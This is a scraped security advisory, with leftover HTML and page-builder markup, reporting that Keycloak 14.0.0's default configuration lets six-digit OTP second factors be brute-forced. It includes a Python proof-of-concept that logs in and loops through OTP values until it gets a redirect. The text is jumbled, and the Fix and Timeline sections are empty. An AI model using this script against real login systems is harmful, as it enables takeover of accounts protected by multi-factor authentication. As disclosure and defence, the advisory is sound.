<\/span> The following insecure default configuration was identified during a pentest. After investigations with the maintainers of Keycloak, it was shown that there is indeed a secure configuration. Nevertheless, as the default configuration is vulnerable, we decided to still disclose this advisory to increase awareness about this issue.<\/em><\/p>\n <\/span><\/p>\n Keycloak enables users to enable a second factor by using one-time password (OTP) Tokens. In Keycloak\u2019s default configuration, these tokens can be guessed in a brute-force attack.<\/p>\n Multi-factor authentication (MFA) is used to secure the access to user accounts on multiple levels. In case of the compromise of one factor, e.g. a password, further factors protect the account against unauthorized access. In the present case, the second factor is a OTP consisting of six digits, which is queried after the entry of valid credentials. The OTP has a validity of 60 seconds.<\/p>\n In recent versions, Keycloak introduced a global protection against brute-force attacks that also protects the second factor of authentication. As this feature is disabled by default and therefore the OTP is not protected against brute-force attacks if not explicitely configured, an attacker with valid credentials is able to guess the value of the OTP under certain circumstances.<\/p>\n <\/span><\/p>\n The issue can be exploited by utilizing Burp Suite<\/a>\u2019s Intruder or writing a custom python script. An exemplary script is given in the following:<\/p>\n<\/div>\n <\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.11\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||20px||false|false\" global_colors_info=\"{}\"] import requests urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<\/p>\n TOTP=int(sys.argv[1])<\/p>\n with requests.Session() as s: match = re.search('action=\"([^\"]+)\"', r.text) print('[*] Logging in') while True: print('[*] Trying TOTP: {:06d}'.format(TOTP))
Advisory ID<\/strong>: usd-2021-0016<\/span>
Affected Product<\/strong>: Keycloak<\/span>
Affected Version<\/strong>: Latest (14.0.0)<\/span>
Vulnerability Type<\/strong>: Multi-Factor-Authentication Brute-Force (CWE-303: Incorrect Implementation of Authentication Algorithm)<\/span>
Security Risk<\/strong>: Medium<\/span>
Vendor URL<\/strong>: https:\/\/www.keycloak.org<\/a>
Vendor Status<\/strong>: Not fixed \/ Default
<\/span><\/p>\nDescription<\/h3>\n
Proof of Concept (PoC)<\/h3>\n
import re
import html
import sys
import urllib3<\/p>\n
print('[*] Fetching session values')
r = s.get('http:\/\/example.usd\/auth\/realms\/master\/protocol\/openid-connect\/auth?client_id=a&redirect_uri=http%3A%2F%2Fexample.usd&state=b&response_mode=fragment&response_type=code&scope=openid&nonce=c&code_challenge=d&code_challenge_method=S256')<\/p>\n
url = html.unescape(match.group(1))<\/p>\n
r = s.post(url, data={'username':', 'password':''})<\/p>\n
match = re.search('action=\"([^\"]+)\"', r.text)
url = html.unescape(match.group(1))<\/p>\n
r = s.post(url, data={'otp':'{:06d}'.format(TOTP), 'login':'Sign In'}, allow_redirects=False)
if r.status_code == 302:
print('[+] SUCCESS: Logged in')
break
if r.status_code == 200:
status = re.search('Invalid authenticator code.', r.text)
if status is None:
print('[!] Unknwon error')
else:
print('[-] Wrong token')
TOTP += 1<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.10.7\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/h3>\n
Fix<\/h3>\n
Timeline<\/h3>\n